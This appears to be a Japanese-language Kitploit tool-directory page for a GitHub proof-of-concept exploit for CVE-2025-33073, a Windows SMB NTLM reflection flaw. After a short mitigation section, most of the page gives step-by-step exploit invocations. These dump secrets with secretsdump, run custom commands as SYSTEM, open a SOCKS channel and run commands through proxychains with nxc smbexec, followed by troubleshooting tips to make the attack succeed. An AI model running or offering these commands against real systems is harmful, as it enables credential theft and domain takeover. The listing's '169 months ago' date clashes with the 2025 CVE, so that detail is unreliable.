Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
脆弱性分析エクスプロイト横移動ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

リポジトリを見る
169ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

✨ CVE-2025-33073: Windows SMB RCE 脆弱性 🚨

🔥 高重大度の認証済みリモートコード実行 🔥 Windows SMB クライアントにおける不適切なアクセス制御 (CWE-284)


🛡️ 主な詳細概要

ツールをダウンロード
項目詳細
CVSS v3.1 スコア8.8 (高) 🔥
影響を受けるシステムWindows 10, 11, Server 2012–2025 (全エディション) 💻
開示日2025年6月10日 📅 (2025年6月のPatch Tuesday で修正)
悪用状況実際に積極的に悪用されています 😱
2025年10月21日に CISA KEV に追加
攻撃ベクトルネットワーク (認証済み) 🌐
影響SYSTEM レベルのコード実行 👑
Kerberos リレーによる横展開
回避NTLM リフレクションの緩和策 ⚡

🛠️ 即時緩和策

  1. 今すぐパッチを適用! 🔧
    → Microsoft の更新プログラムを適用 (例: KB5060998)
    → Microsoft Update Guide 🔗

  2. SMB 署名を有効化 ✍️
    → すべてのクライアントとサーバー で強制
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. NTLM を制限 🚫
    → 可能な限り NTLM をブロック
    → EDR ツールでリレー試行を監視

  4. 自動修正? 🤖
    → Vicarius vRx またはカスタムスクリプトを使用して大規模修正


⚠️ なぜ重要なのか

  • 従来の NTLM 保護をバイパス 🛑
  • SMB 署名が強制されていない場合でも機能
  • 設定ミスのある AD 環境で完全なドメイン乗っ取りを可能に 🏰

2025年11月15日時点のステータス:
✅ 修正済み
❌ 未修正のシステムではまだ悪用されています
🔔 CISA 期限: 2025年11月10日 ⏰


⚠️ 使用例

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

カスタムコマンド secretsdump を実行する代わりに、カスタムコマンドを実行できます。

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS SYSTEM として有効な接続が確立された後、よりステルスにコマンドを実行するため。--target と --target-ip はここでは同じにしてください。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

また、SAM をダンプする代わりに、proxychains 経由でカスタムコマンドを実行できます。

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

DNS を必要としない手動エクスプロイト

デバイスと同じブロードキャストドメインにあり、LLMNR ポイズニングに対して脆弱な場合、DNS レコードを登録しなくてもデバイスを悪用することが可能です。

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

トラブルシューティング:

  • 攻撃にホスト名が使用され、Kali からの DNS ルックアップが発生するため、攻撃が機能しない場合があります。Kali が DNS サーバーを使用していない場合、または impacket-ntlmrelayx から '/ FAILED' メッセージが表示される場合は、ホストを /etc/hosts ファイルに追加してみてください。これにより攻撃が機能するはずです。

  • IP を使用すれば攻撃は機能するはずです。複数回実行すると、失敗ではなく SUCCESS になる場合があります。なぜこれが起こるのかは今のところ完全には明らかではありません。ネットワークに関係していると思います。

  • -M または --method を使用して別の強制方法を試してください。


Wireshark:

ローカル NTLM 認証が行われる

455252866-0a3fe643-2d52-427a-91f2-991770732f62

ローカル NTLM 認証が行われず、FAILED 試行となる

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

参考情報:

  • xterm では中マウスボタンでコピー&ペーストができます。
  • DNS レコードはクライアントにも認識されている必要があります。状況によっては時間がかかる場合があります。数分待ってみてください。
  • これは PoC に過ぎないため、AV/EDR のバイパスは試みられていません。自己責任で使用してください。

待つな — 今すぐパッチを当てよう! 🛑
あなたのネットワークのセキュリティはそれにかかっている。 💪